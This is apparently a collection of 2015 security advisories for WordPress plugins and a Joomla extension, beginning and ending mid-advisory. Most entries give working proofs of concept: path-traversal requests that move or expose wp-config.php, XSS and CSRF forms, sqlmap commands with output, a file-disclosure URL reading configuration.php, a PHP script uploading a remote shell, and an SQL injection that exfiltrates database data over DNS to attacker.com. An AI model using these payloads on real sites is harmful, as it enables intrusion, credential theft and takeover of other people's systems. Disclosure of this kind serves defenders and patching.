http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>
 
Alerts(1)
 
Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description
 
Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=
 
now wp-config.php is in /wp-content/uploads/wp-config.php
 
 
Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt
 
now wp-config.php is renamed to wp-config.txt
 
Directory Listing
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../
 
will list all files and directories
 
Fix
 
No Fix Available at The Moment.
 
Time line
 
Notified Vendor - No Reply
Publish Disclosure

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
 
 Vulnerabilities (2)
=====================
 
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
 
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
    }
}
+++++++++++++++++++++++++++++++++++++++++
 
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
 
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
 
 
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
 
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
 
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
 
 
 Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.

Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.
 
90         $wpdb->query(sprintf("UPDATE $mapsTable
91         SET PolyLines = '%s'
92         WHERE ID = '%s';", $PolyLines, $mapID));
 
.
.
.
163             $wpdb->query(sprintf("
164                 UPDATE $mapsTable
165                 SET TemplateID = '%s',
166                     MapName = '%s',
167                     Settings = '%s',
168                     LastInvoked = CURRENT_TIMESTAMP,
169                     CSSValues = '%s',
170                     CSSValuesList = '%s',
171                     CSSValuesHeading = '%s',
172                     MapHTML = '%s',
173                     IsActive = 1,
174                     ThemeID = '%s'
175                 WHERE ID = %s;",
176                     $Items['mapTemplateName'],
177                     $Items['mapName'],
178                     urldecode($Items['mapSettingsXML']),
179                     urldecode($Items["mapCSSXML"]),
180                     urldecode($Items["listCSSXML"]),
181                     urldecode($Items["headingCSSXML"]),
182                     urldecode($Items["mapHTML"]),
183                     $Items['mapThemeName'],
184                     $mapID));
185         } else {
186 
187             //this is a map insert
188             if (!$wpdb->query(sprintf("
189             INSERT INTO $mapsTable(
190                 TemplateID,
191                 MapName,
192                 DefaultPinImage,
193                 Settings,
194                 LastInvoked,
195                 PolyLines,
196                 CSSValues,
197                 CSSValuesList,
198                 CSSValuesHeading,
199                 MapHTML,
200                 IsActive,
201                 ThemeID
202             ) VALUES ('%s', '%s', '%s', '%s', 
203                     CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204                     $Items['mapTemplateName'],
205                     $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) .     "images/map_pins/pins/111.png",
206                     urldecode($Items['mapSettingsXML']), '',
207                     urldecode($Items["mapCSSXML"]),
208                     urldecode($Items["listCSSXML"]),
209                     urldecode($Items["headingCSSXML"]),
210                     urldecode($Items["mapHTML"]),
211                     $Items['mapThemeName']))) 
.
.
267         $wpdb->query(sprintf("
268             UPDATE $mapsTable
269             SET MapName = '%s',
270             LastInvoked = CURRENT_TIMESTAMP,
271             IsActive = 1
272             WHERE ID = %s;", $mapName, $mapID));
 
In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory:
 
4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12 
13     if (!file_exists($imagesDirectory)) {
14         mkdir($imagesDirectory);
15     }
 
CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
  • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input.
 
48         $wpdb->query(sprintf("UPDATE $mapsTable
49         SET PolyLines = '%s'
50         WHERE ID = '%s';", $PolyLines, $mapID));
218             $wpdb->query(sprintf("
219                 UPDATE $mapsTable
220                 SET TemplateID = '%s',
221                     MapName = '%s',
222                     Settings = '%s',
223                     CSSValues = '%s',
224                     CSSValuesPhoto = '%s',
225                     CSSValuesMap = '%s',
226                     MapHTML = '%s',
227                     IsActive = 1
228                 WHERE ID = %s;",
229                     $_REQUEST['mapTemplateName'],
230                     $_REQUEST['mapName'],
231                     urldecode($_REQUEST['mapSettingsXML']),
232                     urldecode($_REQUEST["parentCSSXML"]),
233                     urldecode($_REQUEST["photoCSSXML"]),
234                     urldecode($_REQUEST["mapCSSXML"]),
235                     urldecode($_REQUEST["mapHTML"]), $mapID));
 
 
238             //this is a map insert
239             if (!$wpdb->query(sprintf("
240             INSERT INTO $mapsTable(
241                 TemplateID,
242                 MapName,
243                 DefaultPinImage,
244                 Settings,
245                 LastInvoked,
246                 PolyLines,
247                 CSSValues,
248                 CSSValuesPhoto,
249                 CSSValuesMap,
250                 MapHTML,
251                 IsActive
252             ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'    , 0);",
253                     $_REQUEST['mapTemplateName'],
254                     $_REQUEST['mapName’]
 
 
331         $wpdb->query(sprintf("
332             UPDATE $mapsTable
333             SET MapName = '%s'
334             IsActive = 1
335             WHERE ID = %s;",
336                 $_REQUEST['mapName'],
337                 $mapID));
 
Also
 
In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:
 
   if (!file_exists($imagesDirectory)) {
       mkdir($imagesDirectory);
   }
 
CVEID: 2015-4615 2015-4617
OSVDB:
Exploit Code:
  • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection
in CP Contact Form with Paypal Wordpress Plugin v1.1.5
# Submitter: Nitin Venkatesh
# Product: CP Contact Form with Paypal Wordpress Plugin
# Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79], Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection')[CWE-89]
# Affected Versions: v1.1.5 and possibly below.
# Tested versions: v1.1.5
# Fixed Version: v1.1.6
# Link to code diff:
https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal
# Changelog:
https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
With CP Contact Form with Paypal you can insert a contact form into a
WordPress website and connect it to a PayPal payment.
 
## Vulnerability Description:
 
The forms in the admin area of the plugin allows CSRF. This gives the
capacity for the attacker to add new forms, modify existing form settings,
launch XSS attacks, export CSV files of the messages, delete forms, and
perform SQL Injection.
 
## Proof of Concept:
 
<h3>CSRF - Action Links</h3>
<ul>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&a=1&r=0.9305673889626347&name=csrf1">Create
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=2&list=1&search=&dfrom=&dto=&cal=2&cp_contactformpp_csv=Export+to+CSV">Export
to CSV</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&c=2&r=0.4520871591860098">
Clone form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&u=6&r=0.558320934244582&name=csrf1">Update
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&d=3&r=0.2828470980050731">Delete
form/item</a></li>
</ul>
 
 
<h3>CSRF, XSS, SQLi - Settings form</h3>
<form action="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=11&r=0.81280830806042"
method="post">
<input type="hidden" name="cp_contactformpp_post_options" value='' />
 
<!--
if cp_contactformpp_id is injected with XSS, the other script vectors won't
work
<input type="hidden" name="cp_contactformpp_id"
value='"><script>alert(3);</script>' />
 
SQL injection possible cp_contactformpp_id
<input type="hidden" name="cp_contactformpp_id" value="1 AND SLEEP(25)" />
-->
 
<input type="hidden" name="cp_contactformpp_id" value='11' />
<input type="hidden" name="fp_from_email" value='asd@evilcorp.org' />
<input type="hidden" name="fp_message" value='The following contact message
has been sent:<%INFO%></textarea><script>alert(1);</script>' />
<input type="hidden" name="cu_message" value='Thank you for your message.
We will reply you as soon as possible.This is a copy of the data
sent:<%INFO%>Best Regards.</textarea><script>alert(2);</script>' />
<input type="hidden" name="submit" value='Save Changes' />
<input type="submit" value="submit" />
</form>
 
## Solution:
 
Upgrade to v1.1.6
 
## Disclosure Timeline:
 
2015-05-19 - Discovered. Contacted developer on support forums.
2015-05-20 - Mailed developer initial report
2015-05-25 - Patched v1.1.6 released
2015-07-09 - Publishing disclosure to FD
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

J2Store v3.1.6, a Joomla! extension that adds basic store functionality to
a Joomla! instance, suffered from two unauthenticated boolean-blind and
error-based SQL injection vulnerabilities. Since February 2015, J2Store has
had about 16,000 downloads as of this writing.
 
 
The first vulnerability was in the sortby parameter within a request made
while searching for products.
 
POST /index.php HTTP/1.1
Host: 192.168.1.3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0)
Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
 
search=&sortby=product_name+DESC&option=com_j2store&view=products&task=browse&Itemid=115
 
 
 
The second vulnerability was in an advanced search multipart form request,
within the manufacturer_ids parameters.
 
POST /index.php HTTP/1.1
Host: 192.168.1.3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0)
Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------69182815810793866481457026727
Content-Length: 1023
 
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="pricefrom"
 
0
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="priceto"
 
521
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="manufacturer_ids[]"
 
1
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="option"
 
com_j2store
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="view"
 
products
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="task"
 
browse
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="Itemid"
 
115
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="9d0a4b9d6d4b46fc51d25844b91c2057"
 
1
-----------------------------69182815810793866481457026727--
 
 
A Metasploit scanner module and two auxiliary modules are available on the
ExploitHub store which will help you find and validate any vulnerable
instances. A PCAP is included with each module.
 
Free Metasploit scanner module:
https://exploithub.com/j2store-3-1-6-sql-injection-scanner.html
 
Metasploit User/Password Enumeration auxiliary module:
https://exploithub.com/j2store-3-1-6-user-password-enumeration-via-sql-injection.html
 
Metasploit Arbitrary File Read auxiliary module:
https://exploithub.com/j2store-3-1-6-arbitrary-file-read-via-sql-injection.html
 
 
Timeline
July 7 2015: Reported to vendor
July 7 2015: Vendor response asking for details
July 7 2015: Details sent
July 7 2015: Vendor sends email saying the vulnerabilities were fixed and a
new version will be out soon
July 8 2015: Version 3.1.7 released, advisory released with modules
 
-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad and iphones.
Vulnerability:
1. Ability to create directories out side of the upload path by using ../:
Lines 56-59 of upload.php:
 
56 // Create target dir
57 if (!file_exists($targetDir)) {
58         @mkdir($targetDir);
59 }      
 
2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of uploads.php don’t verify what types of files are allowed or where they should be placed:
 
138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140         die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" :     "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144         if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145                 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}    , "id" : "id"}');
146         }
147 
148         // Read binary input stream and append it to temp file
149         if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},     "id" : "id"}');
151         }
152 } else {
153         if (!$in = @fopen("php://input", "rb")) {
154                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},     "id" : "id"}');
155         }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159         fwrite($out, $buff);
160 }
 
3. Sql injection 
Lines 131-135 of upload.php fail to handle user input appropriately either by sanitizing or paramaterizing it. Injection points are
any GET/POST to albumid or name.
 
131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `    image`, `status`, `order`, `creation_date` )
132           VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST    ['name']."',1,'','NULL')";
133 
134           $wpdb->query($query);
135 
 
CVEID:
OSVDB:
Exploit Code:
  • <?php
  • /*Remote shell upload exploit for wp-powerplaygallery v3.3 */
  • /*Larry W. Cashdollar @_larry0
  • 6/27/2015
  • albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
  • but you can enumerate these by using curl, and looking for redirect 301 responses:
  • e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
  • ->301 exists else 404 doesn't.
  • shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
  • */
  •  
  •  
  •   $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
  •   $file_name_with_full_path = '/var/www/shell.php';
  •  
  •         echo "POST to $target_url $file_name_with_full_path";
  •   $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);
  •  
  •         $ch = curl_init();
  •   curl_setopt($ch, CURLOPT_URL,$target_url);
  •   curl_setopt($ch, CURLOPT_POST,1);
  •   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  •         curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  •   $result=curl_exec ($ch);
  •   curl_close ($ch);
  •         echo "<hr>";
  •   echo $result;
  •         echo "<hr>";
  • ?>
SQLi PoC:
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1”  —dbms mysql

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"
 
# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 In title will occur Full Path Disclosure of server.
 
# Xploit (LFD/LFI):
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
 Let's Xploit...
 
 First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
 
 ../../../../../../../target/www/configuration.php <= Not Ready
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !
 
 
And Now we have a configuration file...

Advisory ID: HTB23267
Product: Count Per Day WordPress plugin
Vendor: Tom Braider 
Vulnerable Version(s): 3.4 and probably prior
Tested Version: 3.4
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015 
Vendor Patch: July 1, 2015 
Public Disclosure: July 22, 2015 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-5533
Risk Level: Medium 
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered SQL Injection vulnerability in Count Per Day WordPress plugin, which can be exploited to execute arbitrary SQL queries in application’s database, gain control of potentially sensitive information and compromise the entire website. 
 
The vulnerability is caused by insufficient filtration of input data passed via the "cpd_keep_month" HTTP POST parameter to "/wp-admin/options-general.php" script. A remote user with administrative privileges can manipulate SQL queries, inject and execute arbitrary SQL commands within the application’s database. 
This vulnerability can be exploited by anonymous attacker via CSRF vector, since the web application does not check origin of HTTP requests.
 
The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
 
 
<form action = "http://wordpress/wp-admin/options-general.php?page=count-per-day/counter-options.php&tab=tools" method = "POST" name="f1">
<input type="hidden" name="collect" value="Collect old data">
<input type="hidden" name="do" value="cpd_collect">
<input type="hidden" name="cpd_keep_month" value="6 MONTH) AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 2">
<input value="go type="submit" />
</form><script>document.f1.submit();</script>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Count Per Day 3.4.1
 
More Information:
https://wordpress.org/plugins/count-per-day/changelog/
https://plugins.trac.wordpress.org/changeset/1190683/count-per-day
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23267 - https://www.htbridge.com/advisory/HTB23267 - SQL Injection in Count Per Day WordPress Plugin.
[2] Count Per Day WordPress plugin - https://wordpress.org/plugins/count-per-day/ - A statistics plugin which displays Visit Counter, shows reads and visitors per page, visitors today, yesterday, last week, last months and other statistics.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in
Unite Gallery Lite Wordpress Plugin v1.4.6
# Submitter: Nitin Venkatesh
# Product: Unite Gallery Lite Wordpress Plugin
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper
Neutralization of Special Elements used in an SQL Command ('SQL
Injection')[CWE-89]
# Affected Versions: v1.4.6 and possibly below.
# Tested versions: v1.4.6
# Fixed Version: v1.5
# Link to code diff:
https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/
# CVE Status: New & Unassigned
 
## Product Information:
 
The Unite Gallery is all in one image and video gallery for WordPress.
 
## Vulnerability Description:
 
The admin forms of the Unite Gallery Lite Wordpress Plugin are susceptible
to CSRF. Additionally, the following parameters were found to be
susceptible to SQLi -
 
Form submitted to /wp-admin/admin-ajax.php:
- data[galleryID]
 
Form submitted to /wp-admin/admin.php:
- galleryid
- id
 
## Proof of Concept:
 
<!DOCTYPE html>
<html>
<head>
<title>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</title>
</head>
<body>
<h1>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</h1>
<p>CSRF - Create Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='create_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][category]" value='new' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="submit" value="submit" />
</form>
 
<p>CSRF + SQLi - Update Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='update_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][shortcode]" value='[unitegallery
test2]' />
<input type="hidden" name="data[main][category]" value='3' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="hidden" name="data[main][gallery_min_width]" value='150' />
<input type="hidden" name="data[params][tile_width]" value='160' />
<input type="hidden" name="data[params][tile_height]" value='160' />
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />
<input type="hidden" name="data[params][theme_carousel_align]"
value='center' />
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />
<input type="hidden" name="data[params][tile_image_resolution]"
value='medium' />
<input type="hidden" name="data[params][carousel_padding]" value='8' />
<input type="hidden" name="data[params][carousel_space_between_tiles]"
value='20' />
<input type="hidden" name="data[params][carousel_scroll_duration]"
value='500' />
<input type="hidden" name="data[params][carousel_scroll_easing]"
value='easeOutCubic' />
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />
<input type="hidden" name="data[params][carousel_autoplay_timeout]"
value='3000' />
<input type="hidden" name="data[params][carousel_autoplay_direction]"
value='right' />
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]"
value='true' />
<input type="hidden" name="data[params][theme_enable_navigation]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_enable_play]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_align]"
value='center' />
<input type="hidden" name="data[params][theme_navigation_offset_hor]"
value='0' />
<input type="hidden" name="data[params][theme_navigation_position]"
value='bottom' />
<input type="hidden" name="data[params][theme_navigation_margin]"
value='20' />
<input type="hidden" name="data[params][theme_space_between_arrows]"
value='5' />
<input type="hidden" name="data[params][carousel_navigation_numtiles]"
value='3' />
<input type="hidden" name="data[params][position]" value='center' />
<input type="hidden" name="data[params][margin_top]" value='0' />
<input type="hidden" name="data[params][margin_bottom]" value='0' />
<input type="hidden" name="data[params][margin_left]" value='0' />
<input type="hidden" name="data[params][margin_right]" value='0' />
<input type="hidden" name="data[params][tile_enable_action]" value='true' />
<input type="hidden" name="data[params][tile_as_link]" value='false' />
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />
<input type="hidden" name="data[params][tile_enable_border]" value='true' />
<input type="hidden" name="data[params][tile_border_width]" value='3' />
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0'
/>
<input type="hidden" name="data[params][tile_border_radius]" value='0' />
<input type="hidden" name="data[params][tile_enable_outline]" value='true'
/>
<input type="hidden" name="data[params][tile_outline_color]"
value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_shadow]" value='false'
/>
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b'
/>
<input type="hidden" name="data[params][tile_enable_image_effect]"
value='false' />
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw'
/>
<input type="hidden" name="data[params][tile_image_effect_reverse]"
value='false' />
<input type="hidden" name="data[params][tile_enable_overlay]" value='true'
/>
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4'
/>
<input type="hidden" name="data[params][tile_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />
<input type="hidden" name="data[params][tile_show_link_icon]" value='false'
/>
<input type="hidden" name="data[params][tile_space_between_icons]"
value='26' />
<input type="hidden" name="data[params][tile_enable_textpanel]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][tile_textpanel_always_on]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_appear_type]"
value='slide' />
<input type="hidden" name="data[params][tile_textpanel_padding_top]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_left]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_padding_right]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_bg_color]"
value='#000000' />
